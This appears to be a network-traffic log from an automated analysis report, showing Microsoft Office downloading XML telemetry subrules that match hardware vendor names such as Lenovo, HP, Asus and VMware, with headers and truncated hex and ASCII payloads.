2024-10-30 02:46:34 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
7192.168.2.44976213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:34 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:34 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:34 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
ETag: "0x8DC582B9F6F3512"
x-ms-request-id: 633f9008-101e-00a2-3e9b-279f2e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024634Z-16849878b78p49s6zkwt11bbkn000000070g00000000q5fe
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:34 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session IDSource IPSource PortDestination IPDestination Port
8192.168.2.44976413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:34 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:34 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:34 GMT
Content-Type: text/xml
Content-Length: 632
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB6E3779E"
x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024634Z-16849878b786lft2mu9uftf3y400000008sg000000001zq3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:34 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


Session IDSource IPSource PortDestination IPDestination Port
9192.168.2.44976313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:34 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:34 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:34 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
ETag: "0x8DC582BB10C598B"
x-ms-request-id: bbf1142f-f01e-0085-589b-2788ea000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024634Z-15b8d89586f989rkwt13xern5400000002s000000000556b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:34 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
10192.168.2.44976513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:34 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:34 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:34 GMT
Content-Type: text/xml
Content-Length: 467
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
ETag: "0x8DC582BA6C038BC"
x-ms-request-id: e84b733d-701e-005c-1bb8-26bb94000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024634Z-16849878b78qfbkc5yywmsbg0c000000072g00000000eeqe
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:34 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
11192.168.2.44976613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:35 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:35 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:35 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
ETag: "0x8DC582BBAD04B7B"
x-ms-request-id: 910f925b-b01e-001e-0b30-2a0214000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024635Z-15b8d89586f989rkwt13xern5400000002ng00000000dumr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:35 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
12192.168.2.44976713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:35 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:35 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:35 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB344914B"
x-ms-request-id: 9985b9b7-a01e-0021-5827-28814c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024635Z-15b8d89586fvk4kmbg8pf84y8800000008eg0000000003gt
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:35 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
13192.168.2.44976913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:35 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:35 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:35 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
ETag: "0x8DC582B9018290B"
x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024635Z-16849878b78smng4k6nq15r6s400000008z0000000008m5f
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:35 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
14192.168.2.44976813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:35 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:35 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:35 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
ETag: "0x8DC582BA310DA18"
x-ms-request-id: fcb0891e-801e-007b-6669-28e7ab000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024635Z-15b8d89586fvpb59307bn2rcac00000002n00000000045tq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:35 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
15192.168.2.44977013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:35 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:35 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:35 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
ETag: "0x8DC582B9698189B"
x-ms-request-id: 30dbe6fd-101e-0034-66db-2696ff000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024635Z-17c5cb586f6sqz6f73fsew1zd8000000018g000000000kkw
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:35 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
16192.168.2.44977113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:36 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:36 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:36 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA701121"
x-ms-request-id: 2fd6bd5d-d01e-007a-394f-26f38c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024636Z-16849878b78j7llf5vkyvvcehs00000008cg00000000uf79
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:36 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
17192.168.2.44977213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:36 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:36 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:36 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA41997E3"
x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024636Z-16849878b78wc6ln1zsrz6q9w80000000740000000008krv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:36 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session IDSource IPSource PortDestination IPDestination Port
18192.168.2.44977413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:36 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:36 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:36 GMT
Content-Type: text/xml
Content-Length: 464
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
ETag: "0x8DC582B97FB6C3C"
x-ms-request-id: 214ea441-b01e-00ab-0e9b-27dafd000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024636Z-15b8d89586flspj6y6m5fk442w0000000da0000000008fx2
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
